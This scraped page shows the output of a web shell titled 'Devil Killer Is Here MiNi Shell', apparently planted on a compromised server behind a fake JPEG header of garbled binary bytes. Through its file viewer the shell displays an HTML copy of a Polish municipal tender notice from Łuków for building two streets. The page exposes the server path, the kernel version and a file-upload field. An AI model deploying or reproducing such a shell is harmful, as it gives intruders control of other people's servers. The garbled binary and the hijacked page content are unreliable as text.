JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231009/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231009/0043387901-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa ul. R. Stankiewicza (114389L) i ul. B. Łukasiewicz w m. Łuków </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto Łuków</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 711582380</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Piłsudskiego 17</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łuków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">21-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL815 - Puławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@um.lukow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.lukow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa ul. R. Stankiewicza (114389L) i ul. B. Łukasiewicz w m. Łuków </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0897980e-628c-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00433879</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-10-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00030918/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Budowaul. R.Stankiewicza (114389L) i ul. B. Łukasiewicz w m. Łuków</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-0897980e-628c-11ee-a60c-9ec5599dddc1 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Adres strony internetowej prowadzonego postępowania (link prowadzący<br/>bezpośrednio do widoku postępowania na Platformie e-Zamówienia:<br/>https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-0897980e-628c-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie<br/>zamówienia publicznego komunikacja między Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która<br/>jest dostępna pod adresem https://ezamowienia.gov.pl.<br/>Identyfikator (ID) postępowania na Platformie e-Zamówienia:ocds-148610-0897980e-628c-11ee-a60c-9ec5599dddc1.<br/>- Wykonawca zamierzający wziąć udział w postępowaniu musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia.<br/>Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa<br/>Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w<br/>zakładce „Centrum Pomocy”.<br/>- Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia<br/>ani logowania.<br/>- Komunikacja w postępowaniu, z wyłączeniem składania ofert odbywa się drogą elektroniczną za pośrednictwem formularzy do<br/>komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji”<br/>odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi.<br/>- Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy”<br/>na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji”<br/>służących do zadawania pytań dotyczących treści SWZ wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-<br/>Zamówienia.<br/>- Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy<br/>plików przesyłanych jako załączniki do jednego formularza).<br/>- Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz<br/>informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>- W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację wykonawcy i Zamawiającego za pośrednictwem<br/>Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail: zp@um.lukow.pl<br/>(nie dotyczy składania ofert).<br/>- Pozostałe wymagania w zakresie komunikacji zostały wskazane w SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust.1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związkuz przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych)(Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>	administratorem Pani/Pana danych osobowych jest Burmistrz Miasta Łuków, ul. Piłsudskiego 17 21-400 Łuków, sekretariat@um.lukow.pl<br/>	inspektorem ochrony danych w Urzędzie Miasta Łuków jest Pan Łukasz Kuśmierczak, iod@um.lukow.pl, zastępcą Inspektora Ochrony Danych jest Radosław Toporowicz, adres e-mail: iod@um.lukow.pl. <br/>	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu prowadzenia przedmiotowego postępowania o udzielenie zamówienia publicznego oraz zawarcia umowy, a podstawą prawną ich przetwarzania jest obowiązek prawny stosowania sformalizowanych procedur udzielania zamówień publicznych spoczywający na zamawiającym jako jednostce sektora finansów publicznych.<br/>	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. – Prawo zamówień publicznych dalej „ustawa Pzp”;<br/>	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>	posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych*;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO **;<br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>	nie przysługuje Pani/Panu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>Jednocześnie Zamawiający przypomina o ciążącym na Pani/Panu obowiązku informacyjnym wynikającym z art. 14. RODO względem osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które Zamawiający pośrednio pozyska od Wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w art. 14 ust. 5 RODO.<br/>* skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania<br/>o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>** prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.17.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> ZAMÓWIENIE PODSTAWOWE (GWARANTOWANE).<br/>4.1.	Przedmiotem zamówienia jest wykonanie robót budowlanych związanych z budową ulicy <br/>R. Stankiewicza i B. Łukasiewicz w Łukowie wraz z infrastrukturą techniczną w ramach zadania inwestycyjnego: „Budowa ul. R. Stankiewicza (114389L) i ul. B. Łukasiewicz w m. Łuków”. Zadanie obejmuje prace w zakresie budowy: jezdni, chodników, zjazdów oraz budowy sieci: kanalizacji deszczowej z przykanalikami i wpustami deszczowymi oraz kanału technologicznego. Inwestycja zlokalizowana jest na działkach należących do Inwestora stanowiących pas drogowy – zamówienie podstawowe (gwarantowane).<br/>Zakres robót objętych zamówieniem:<br/>4.2.	Budowa drogi gminnej długości 906,24 m w zakresie:<br/>4.2.1.	robót pomiarowych tj. : wytyczenia osi jezdni i przebiegu infrastruktury technicznej,<br/>4.2.2.	robót przygotowawczych i rozbiórkowych (m.in. rozebranie krawężników betonowych, obrzeży, ław betonowych, kostki brukowej, podbudowy itd.),<br/>4.2.3.	robót ziemnych,<br/>4.2.4.	wykonanie kanalizacji deszczowej z przykanalikami i kratkami ściekowymi,<br/>4.2.5.	wykonanie kanału technologicznego zgodnie z projektem,<br/>4.2.6.	wykonanie podbudowy zgodnie z projektem,<br/>4.2.7.	wykonanie ławy betonowej z oporem pod krawężniki,<br/>4.2.8.	ustawienie nowych krawężników betonowych15x30-22x100 (prosty, najazdowy, przejściowy) na ławie betonowej z oporem i podsypce cem-piask,<br/>4.2.9.	ustawienie nowych obrzeży betonowych na podsypce z wypełnieniem spoin,<br/>4.2.10.	wykonanie nawierzchni chodników z kostki brukowej o gr. 6 cm (podsypka cem. – piaskowa 1:4 gr. 5cm po zagęszczeniu i wypełnieniem spoin, podbudowa z kruszywa łamanego gr.15, warstwa odsączająca z piasku gr.20cm) zgodnie ze sztuką budowlaną,<br/>4.2.11.	wykonanie nawierzchni zjazdów do posesji z kostki brukowej gr. 8cm (podsypka cem. – piaskowa1:4 gr. 5cm po zagęszczeniu i wypełnieniem spoin, podbudowa z kruszywa gr. 10cm, podbudowa betonowa gr.10, warstwa odsączająca z piasku gr.20cm) zgodnie ze sztuką budowlaną,<br/>4.2.12.	wykonanie skrzyżowań wyniesionych oraz placów nawrotowych zgodnie z projektem budowlanym i sztuką budowlaną,<br/>4.2.13.	wykonanie odwodnienia powierzchniowego drogi poprzez zastosowanie odpowiednich spadków podłużnych i poprzecznych,<br/>4.2.14.	wykonanie nawierzchni stanowiących warstwę ścieralną gr. 4,0 cm, warstwę wiążącą o grubości 5,0cm na warstwach projektowanych podbudów i warstwy odsączającej,<br/>4.2.15.	regulacja wpustów ulicznych i włazów kanalizacyjnych i sanitarnych,<br/>4.2.16.	regulacja studzienek telefonicznych, gazowych, wodociągowych,<br/>4.2.17.	wykonanie oznakowania poziomego i pionowego wg założeń projektowych,<br/>4.2.18.	wykonanie i montaż tablicy informacyjnej (1 szt.) o dofinansowaniu ze środków Rządowego Funduszu Rozwoju Dróg wg przekazanego projektu (szczegółowy opis w Załączniku),<br/>4.2.19.	pielęgnacja nawierzchni i oddanie jej do ruchu,<br/>4.2.20.	prace porządkowe i wykonanie zieleńców tj. wyprofilowanie, wygrabienie, posiew trawy <br/>z dopuszczeniem możliwości wykonania nasadzeń roślinności piennej przez Zamawiającego.<br/>4.3.	Prace budowlane poszczególnych branż powinny być ze sobą skoordynowane i prowadzone w taki sposób, aby wprowadzać zachować prawidłową kolejność wykonywanych zadań. <br/>4.4.	Charakterystyczne parametry wielkościowe założonej budowy drogi wg projektu długość 906,24 m z podziałem na odcinki:<br/>4.4.1.	ul. B. Łukasiewicz od 0+003,67 do 0+230,33 km),<br/>4.4.2.	ul. Stankiewicza odc. A od 0+000,00 do 0+230,33 km),<br/>4.4.3.	ul. Stankiewicza odc. B od 0+000,00 do 0+127,78 km),<br/>4.4.4.	ul. Stankiewicza odc. C od 0+000,00 do 0+078,55 km),<br/>4.4.5.	ul. Stankiewicza odc. D od 0+000,00 do 0+112,52 km),<br/>4.4.6.	ul. Stankiewicza odc. E od 0+000,00 do 0+105,36 km),<br/>4.4.7.	ul. Stankiewicza odc. F od 0+000,00 do 0+042,91 km),<br/>4.4.8.	powierzchnia jezdni – około 4630,5 m2,<br/>4.4.9.	powierzchnia chodnika – około 2 229,1 m2,<br/>4.4.10.	powierzchnia zjazdów – około 1 164,1 m2,<br/>4.4.11.	powierzchnia zjazdów na pola – około 564,7 m2,<br/>4.4.12.	powierzchnia krawężników, oporników i obrzeży – około 439 m2.<br/>4.5.	Realizacja zadania zamyka się w granicach pasa drogowego.<br/>4.6.	Roboty należy wykonać na podstawie decyzji Nr 63 z dnia 31.08.2023 roku nr ewidencyjny B.6740.67.2023.EM. <br/>4.7.	Przedmiot zamówienia szczegółowo został określony w dokumentacji projektowej, szczegółowych specyfikacjach technicznych wykonania i odbioru robót oraz pomocniczo w przedmiarach robót stanowiących załącznik do SWZ. Roboty należy realizować po uprzednim zawiadomieniu <br/>w imieniu Zamawiającego Powiatowego Inspektora Nadzoru Budowlanego w Łukowie o terminie rozpoczęcia robót budowlanych. Po zakończeniu robót, w imieniu Zamawiającego zawiadomić Powiatowego Inspektora Nadzoru Budowlanego w Łukowie o zakończeniu budowy.<br/>4.8.	Wykonanie tablicy informacyjnej (1 szt.) wraz z ustawieniem (montażem) ich w miejscach wskazanych przez Zamawiającego, informujących o realizacji zadania inwestycyjnego pn. „Budowa ul. Stankiewicza (114389L) w m. Łuków” z udziałem środków Rządowego Funduszu Rozwoju Dróg.<br/>4.8.1.	Wymogi poglądowe dotyczące przedmiotu zamówienia muszą być zgodne z Rozporządzeniem Rady Ministrów z dnia 7 maja 2021r. w sprawie określenia działań informacyjnych podejmowanych przez podmioty realizujące zadania finansowane lub dofinansowane z budżetu państwa lub z państwowych funduszy celowych. Tablica powinna zawierać : <br/>a)	barwy Rzeczypospolitej Polskiej i wizerunek godła Rzeczypospolitej Polskiej;<br/>b)	informację o dofinansowaniu lub dofinansowaniu zadania z budżetu państwa lub z państwowych funduszy celowych;<br/>c)	rodzaj dotacji budżetowej lub nazwę programu lub funduszu;<br/>d)	nazwę zadania;<br/>e)	wartość finansowania lub dofinansowania i całkowitą wartość zadania.<br/>4.8.2.	Opis tablicy:<br/>a)	tablica informacyjna wolnostojąca, jednostronna o wymiarach: 120 cm (wysokość) i 180 cm (szerokość) w kolorze, <br/>b)	wykonana na podkładach z aluminiowej płyty kompozytowej z wypełnieniem poliuretanowym o grubości min. 3 mm, <br/>c)	lico tablicy wykonane dowolną techniką (druk wielkoformatowy, druk UV, folia samoprzylepna) zapewniającą trwałość i niezmienność kolorystyki w okresie co najmniej 6 lat, <br/>d)	wydruk zabezpieczony laminatem, umieszczona na wysokości min. 2 m od podłoża do dolnej krawędzi tablicy; konstrukcja stalowa malowana,<br/>e)	elementy mocujące tablicę do konstrukcji muszą być zamontowane w sposób niewidoczny od strony lica tablicy. <br/>4.8.3.	montaż przedmiotu zamówienia w miejscu wskazanym przez Zamawiającego,<br/>4.8.4.	termin wykonania w ciągu 14 dni od momentu podpisania umowy.<br/>4.8.5.	Na tablicy należy umieścić informacje które zostaną przekazane przez Zamawiającego po podpisaniu umowy.<br/>4.9.	Szczegółowy opis przedmiotu zamówienia podstawowego (OPZ) zawiera załącznika nr 1 a) do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45232300-5 - Roboty budowlane i pomocnicze w zakresie linii telefonicznych i ciągów komunikacyjnych</p> <p class="mb-0">45230000-8 - Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei; wyrównywanie terenu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> PRAWO OPCJI.<br/>4.10.	Zamawiający przewiduje Prawo Opcji, w ramach którego może on (ale nie jest zobligowany) zlecić Wykonawcy wykonanie robót budowlanych związanych z oświetleniem ulicy R. Stankiewicza i B. Łukasiewicz w Łukowie w ramach zadania inwestycyjnego pn: „Budowa ul. R. Stankiewicza (114389L) i ul. B. Łukasiewicz w m. Łuków”. <br/>4.11.	Zadanie obejmuje prace w zakresie budowy linii zasilającej oświetlenie uliczne wraz z montażem stanowisk słupowych.<br/>4.12.	Inwestycja zlokalizowana jest na działkach należących do Inwestora stanowiących pas drogowy.<br/>4.13.	Prace budowlane poszczególnych branż powinny być ze sobą skoordynowane i prowadzone w taki sposób, aby zachować prawidłową kolejność wykonywanych zadań. <br/>4.14.	Charakterystyczne parametry wielkościowe założonej budowy drogi wg projektu:<br/>4.14.1.	napięcie sieci zasilającej :400/230 V~,<br/>4.14.2.	linie oświetleniowe kabel typu YKYżo 5x35 mm2 prowadzony na całej trasie w rurach osłonowych DVR75;<br/>4.14.3.	oprawa słupowa LED zgodna z projektem budowlanym;<br/>4.14.4.	słup oświetleniowy wys. 6m aluminiowy zgodny z projektem budowlanym;<br/>4.14.5.	fundament betonowy o wym. 330x330x1000;<br/>4.14.6.	zasilanie oświetlenie z istniejącego złącza kablowego;<br/>4.14.7.	uziemienie słupów zgodnie z projektem;<br/>4.15.	Roboty zostaną wykonane po uzyskaniu prawomocnej decyzji administracyjnej oraz na podstawie Projektu budowlanego pn. Budowa oświetlenia ul. R. Stankiewicza i B. Łukasiewicza w Łukowie. <br/>4.16.	Przedmiot zamówienia szczegółowo został określony w dokumentacji projektowej, szczegółowych specyfikacjach technicznych wykonania i odbioru robót oraz pomocniczo w przedmiarach robót stanowiących załącznik do SWZ. Roboty należy realizować po uprzednim zawiadomieniu <br/>w imieniu Zamawiającego Powiatowego Inspektora Nadzoru Budowlanego w Łukowie o terminie rozpoczęcia robót budowlanych. Po zakończeniu robót, w imieniu Zamawiającego zawiadomić Powiatowego Inspektora Nadzoru Budowlanego w Łukowie o zakończeniu budowy.<br/>4.17.	Zamawiający przewiduje możliwość skorzystania z prawa opcji, w ramach którego może on zlecić Wykonawcy wykonanie robót budowlanych którego zakres został szczegółowo opisany w Załączniku nr 1 b) do SWZ), za cenę wskazaną w ofercie i na warunkach opisanych w umowie i SWZ.<br/>4.18.	Skorzystanie przez Zamawiającego z Prawa Opcji jest dopuszczalne w terminie do 90 dni od dnia zawarcia Umowy. Warunkiem skorzystania z prawa opcji jest posiadanie środków finansowych przez Zamawiającego na realizację prawa opcji oraz decyzji pozwolenia na budowę na roboty objęte opcją.<br/>4.19.	Zamawiający 